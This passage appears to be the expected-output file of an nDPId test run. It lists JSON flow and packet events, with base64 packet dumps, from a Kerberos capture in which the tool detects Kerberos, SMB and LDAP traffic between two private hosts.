Jkc3DH"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931218,"flow_last_seen":1549337931218,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337931218,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1549337931218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337931218,"pkt":"pB9ywglqAAgCHEeuCABFAACxAI5AAIAGkMesEAjJrBAICMAXAFhuRvAsCoQzw1AYAQDQpAAAiAqFUHJzV5J+NXZTIhoIU8GbmBSxYcQbV4PW+ckPMTgFBw0KsYU9otlYXn6Tyj5\/BmOv8b2TCLvhZTzW6Z3PoLeUqFO88\/fWi+AgP8mYvV1NNCnNorn77cmRI2eXkDk7qLKlgMm4cUN+eWFUE7G2Z1e9ZdF2LM4CSirBRuN96IFr6Z0blZRnqpw="}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJMRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"}
00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8xKOZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="}
00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="}
00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937690,"flow_last_seen":1549337937690,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937690,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1549337937690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937690,"pkt":"pB9ywglqAAgCHEeuCABFAAEyAM1AAIAGkAesEAjJrBAICMAbAYXq\/lHZFzDO61AYAQB3VwAADK3yhyWG\/w4ePjAcLdmQD9l5KJpA6NxzQuCtaFM+te5CWXRB5sUkdKJyUVp4kqyFJvIav1zvlLEwv\/M6QDvIyPip6cO\/Y7DDZ55OmD6IlKO8Nx5lANmfdaxcK4l74ZAlM45v2cQu8OV3yuWKq5L2jtnHunCltg9I9Mqjq93VmxUc7poK8vfSfY1YgBhAmlp0cXMsoyIbcEQodelj3wLBZ2oxItwV78GGNt7TlfW6joQ5wfkj6ZEyRFJn0CVihbNqYYKxBD44uauIJQKkPsQlzXsxooh9lhiWoZtuh5F2\/1LO7drek9zYg6pqUFpyhpL3WcFxh3R7Uuv9RQ5CYfOoVItdeOxn2w53bU0="}
00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937691,"pkt":"AAgCHEeupB9ywglqCABFAAD6E5tAAIAGfXGsEAgIrBAIyQGFwBsXMM7r6v5S41AYAQDOWAAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1JH5VWFTlwrbTZZZgbjZtW4QY+VaIr2rFT9\/AbDkv31Idx3xo24Bwzqv50t5zQXx7Id1H\/iLYt+nRqN0NWzCDJwnAfwcbOTGF30f3qnaqB+vDQ9EhQX38cpSy926C3lIc0Vkhc+VaaHdh510+B"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937700,"flow_last_seen":1549337937700,"flow_idle_time":7560000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937700,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1549337937700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937700,"pkt":"pB9ywglqAAgCHEeuCABFAAEyANVAAIAGj\/+sEAjJrBAICMAcAYWCU2zwSN6TcFAYAQDS2QAAEgduSF05n8MFVjy4LWbkIsui7POF\/jI0fgAi3\/kn4+lZJrv4uo1Xj0IHKshBaLfyrICuzZtbBAFYjLvQz7y8gyRTfkwzadmnUFntTq1Eam1s4n2Qhfn1fuSUa5DAR1i941DEujmYu8fTZX3tp1hllqkxXisHcqSEIi8W9weLGXgpYEZYoErMkYejHKEeDmPCwQO6JC7sDmP8cAErQb7Rc88wLF4lFI7xOIE4FiH\/05afA1w9V5d1P2yDaGB6bADs\/c2xi7QKQuP+FixF4gof0ovK0nwq\/y7Hd27V4SQ4qHRNlXJex92QoEPhio00QFq1bLTnuvdcqFYcMu\/6\/tRVEcFKp0ezr7WF5MI="}
00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
00731{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
